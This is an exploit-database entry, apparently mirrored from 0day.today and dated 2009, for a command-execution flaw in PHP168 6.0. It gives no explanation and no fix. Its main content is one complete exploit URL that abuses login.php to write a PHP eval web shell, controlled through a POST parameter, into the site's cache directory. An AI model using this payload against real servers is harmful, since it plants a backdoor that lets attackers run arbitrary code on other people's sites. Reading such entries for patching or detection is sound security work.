id: 9955
date: 10/28/2009
title: PHP168 6.0 Command Execution
author: Securitylab
cves: 

============================
PHP168 6.0 Command Execution
============================


#################################################################
# Application Info:
# Name: PHP168
# Version: 6.0
#################################################################
# Discoverd By: Securitylab
#################################################################
# http://site.com/login.php?makehtml=1&chdb[htmlname]=seek.php&chdb[path]=cache&content=<?php%20@eval($_POST[s]);?>
#================================================================
#################################################################



#  0day.today [2023-03-22]  #